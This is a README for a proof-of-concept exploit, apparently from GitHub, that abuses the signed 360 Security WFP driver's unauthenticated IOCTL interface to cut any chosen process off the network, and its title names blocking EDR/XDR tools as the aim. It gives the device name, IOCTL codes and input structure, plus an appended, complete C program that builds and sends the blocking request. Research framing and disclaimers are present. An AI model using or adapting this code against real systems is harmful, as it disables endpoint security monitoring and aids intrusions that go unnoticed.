BYOVD: Use 360 WFP driver to block EDR/XDR network connection.
kyxiaxiang/360WFP_Exploit
360WFP_Exploit

A proof-of-concept (PoC) that abuses the IOCTL interface of the 360 Security WFP driver (360netmon_x64_wfp.sys). Its purpose is to verify one specific risk: a kernel driver whose device control interface does not authenticate its caller can be driven by any third-party program that is able to open the device, and its kernel-mode capabilities (here, a WFP callout that blocks traffic) then become available to that program.

This project is intended for security research and vulnerability analysis only. It must not be used for any illegal purposes.


Project Overview

During reverse engineering of the 360 Security network monitoring driver 360netmon_x64_wfp.sys, the following behaviors were observed:

  • The driver exposes two device objects to user mode:

    • \\.\360TdiFilter
    • \\.\360TdiSpeed
  • Any process running with administrator privileges can open these devices and send requests to them via DeviceIoControl

  • The IRP_MJ_DEVICE_CONTROL dispatch routine performs no check of its own on the caller: it does not verify the calling process's identity, image path, or code signature

  • Certain IOCTL functions can be used directly to:

    • Dynamically add WFP filters
    • Configure per-process network throttling
    • Completely block network access for an arbitrary process

This repository provides a minimal PoC demonstrating how a process on a system where 360 Security is installed (so that the signed driver is already loaded) can block the network access of any specified process by calling only the driver's own, legitimate interfaces.


Vulnerability / Issue Summary

Core Problem

At the entry point of the driver's IRP_MJ_DEVICE_CONTROL dispatch routine, the only thing validated is which device object the request arrived on (rdi holds the DeviceObject argument of the dispatch routine):

cmp rdi, g_pDeviceObject_TdiFilter
jz  ...

No caller privilege validation or source authentication is performed beyond that. Whatever the device object's security descriptor enforces when the handle is opened (the page reports that administrator-level processes can open it) is the only gate; once the handle exists, the dispatch routine trusts every request.

As a result, any administrator-privileged process can:

  • Call IOCTL 0x220804 to configure throttling or blocking of a process's network traffic
  • Call IOCTL 0x220444 to dynamically modify WFP filtering rules

Note for practitioners: an administrator can already block a process at the WFP layer through the documented user-mode API (FwpmFilterAdd0 with an FWP_ACTION_BLOCK filter keyed on the application ID). What this interface adds is that the block is enforced inside a signed security vendor's kernel callout, so no filter owned by the attacker's process is registered with the filter engine and no driver of the attacker's own needs to be loaded.

Demonstration

This PoC implements the following operations:

  • Open the device object \\.\360TdiFilter
  • Construct the input data structure expected by the driver
  • Use IOCTL 0x220804 to set a target process into “fully block network” mode

Result:

  • All TCP/UDP connections of the specified process are dropped at the WFP layer by the driver's callout
  • No code injection or hooking is required
  • The operation is performed entirely through the driver's legitimate IOCTL interface

Usage

Build

Open the project in Visual Studio and build:

x64 Release

Example

360WFP_Exploit.exe "C:\Windows\System32\notepad.exe"

After execution, the target process immediately loses all network connectivity (the PoC converts the supplied Win32 path to the NT path the driver expects before sending the request; see utils.c).


Project Structure

.
├── src/
│   ├── main.c          // PoC main logic
│   ├── driver_io.c     // IOCTL invocation wrapper
│   └── utils.c         // helper functions (e.g., path conversion)
├── README.md
└── LICENSE

Technical Details

Core data structure expected by the driver (input buffer of IOCTL 0x220804). The comments on qwBlockCnnt, nLimitSend and nLimitRecv follow the behavior described on this page; the remaining comments are inferred from the field names and should be treated as assumptions:

typedef struct _PACK {
    WCHAR szNtPath[MAX_PATH + 40];  // NT path of the target image (e.g. \Device\HarddiskVolumeN\...), presumed from the name
    WCHAR szPath[MAX_PATH];         // Win32 path of the target image, presumed from the name
    BOOL bCancelFlag;               // presumably removes an existing rule when non-zero
    LONGLONG qwBlockCnnt;           // LLONG_MAX = block all of the process's connections
    LONGLONG nLimitSend;            // send throttling limit
    LONGLONG nLimitRecv;            // receive throttling limit
    DWORD dwZeroCheck;              // presumably must be zero
} PACK, *PPACK;

When the request sets:

qwBlockCnnt = LLONG_MAX

the driver's WFP callout returns, for every connection of the target process:

FWP_ACTION_BLOCK

which results in complete network blocking for that process.
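The request-building step from the Demonstration section and the structure above, as an added example that is not the repository's code. It decodes the IOCTL value the way a reverser would (the CTL_CODE layout is Microsoft's documented one), fills a PACK for "fully block network" mode, and, on Windows only, sends it to \\.\360TdiFilter. The IOCTL constant names are ours; the values come from this README. It assumes the caller already has the target's NT path (the repository's utils.c does that conversion; this example does not) and that the fields the README does not describe are zero. On a non-Windows host everything except the DeviceIoControl call compiles, so the layout can be checked off-box.

```c
/* Added example, not part of kyxiaxiang/360WFP_Exploit. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#ifdef _WIN32
#include <windows.h>
#else
/* Same sizes as the MSVC x64 types so sizeof(PACK) matches the driver's view. */
typedef uint16_t WCHAR;
typedef int32_t  BOOL;
typedef int64_t  LONGLONG;
typedef uint32_t DWORD;
#define MAX_PATH 260
#endif

/* Names are ours; values are the ones documented on this page. */
#define IOCTL_360_PROCESS_LIMIT 0x220804u
#define IOCTL_360_WFP_FILTER    0x220444u
#define TDI_FILTER_DEVICE       "\\\\.\\360TdiFilter"

typedef struct _PACK {
    WCHAR    szNtPath[MAX_PATH + 40];
    WCHAR    szPath[MAX_PATH];
    BOOL     bCancelFlag;
    LONGLONG qwBlockCnnt;
    LONGLONG nLimitSend;
    LONGLONG nLimitRecv;
    DWORD    dwZeroCheck;
} PACK, *PPACK;

/* CTL_CODE layout: (DeviceType << 16) | (Access << 14) | (Function << 2) | Method */
typedef struct {
    unsigned device_type, access, function, method;
} ioctl_fields;

ioctl_fields decode_ioctl(uint32_t code) {
    ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFF;   /* 0x22 == FILE_DEVICE_UNKNOWN */
    f.access      = (code >> 14) & 0x3;      /* 0 == FILE_ANY_ACCESS */
    f.function    = (code >> 2)  & 0xFFF;
    f.method      =  code        & 0x3;      /* 0 == METHOD_BUFFERED */
    return f;
}

/* Widen an ASCII path into a fixed-size WCHAR buffer; 0 if it would not fit. */
static int widen(WCHAR *dst, size_t cap, const char *src) {
    size_t n = strlen(src);
    if (n + 1 > cap) return 0;
    for (size_t i = 0; i < n; i++) dst[i] = (WCHAR)(unsigned char)src[i];
    dst[n] = 0;
    return 1;
}

/* Fill the request that puts a process into "fully block network" mode.
   Assumption: fields the README does not describe are left zero. */
int build_block_request(PACK *p, const char *nt_path, const char *win32_path) {
    memset(p, 0, sizeof *p);
    if (!widen(p->szNtPath, MAX_PATH + 40, nt_path)) return 0;
    if (!widen(p->szPath, MAX_PATH, win32_path)) return 0;
    p->bCancelFlag = 0;
    p->qwBlockCnnt = INT64_MAX;   /* LLONG_MAX: callout answers FWP_ACTION_BLOCK */
    p->nLimitSend  = 0;
    p->nLimitRecv  = 0;
    p->dwZeroCheck = 0;
    return 1;
}

#ifdef _WIN32
/* Deliver the request; only meaningful where 360netmon_x64_wfp.sys is loaded. */
int send_block_request(const PACK *p) {
    HANDLE h = CreateFileA(TDI_FILTER_DEVICE, GENERIC_READ | GENERIC_WRITE,
                           0, NULL, OPEN_EXISTING, 0, NULL);
    if (h == INVALID_HANDLE_VALUE) return 0;
    DWORD returned = 0;
    BOOL ok = DeviceIoControl(h, IOCTL_360_PROCESS_LIMIT, (LPVOID)p, (DWORD)sizeof *p,
                              NULL, 0, &returned, NULL);
    CloseHandle(h);
    return ok ? 1 : 0;
}
#endif

int main(void) {
    ioctl_fields f = decode_ioctl(IOCTL_360_PROCESS_LIMIT);
    printf("0x%X: type=0x%X func=0x%X method=%u access=%u\n",
           IOCTL_360_PROCESS_LIMIT, f.device_type, f.function, f.method, f.access);
    PACK req;
    /* Constructed sample target; the NT path is whatever utils.c would produce. */
    if (!build_block_request(&req, "\\Device\\HarddiskVolume3\\Windows\\System32\\notepad.exe",
                             "C:\\Windows\\System32\\notepad.exe"))
        return 1;
    printf("sizeof(PACK)=%zu qwBlockCnnt=%lld\n", sizeof req, (long long)req.qwBlockCnnt);
#ifdef _WIN32
    return send_block_request(&req) ? 0 : 1;
#else
    return 0;
#endif
}
```

The decoded value shows why the dispatch routine's missing check matters: both IOCTLs carry FILE_ANY_ACCESS in their access bits, so the I/O manager does not require the handle to have been opened with any particular right; the device object's DACL at CreateFile time is the only thing standing between a caller and the kernel callout.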


Disclaimer

  • This project is provided for security research and technical learning purposes only
  • Do not use it for any illegal or unauthorized activities
  • The author bears no responsibility for any consequences resulting from misuse of this tool

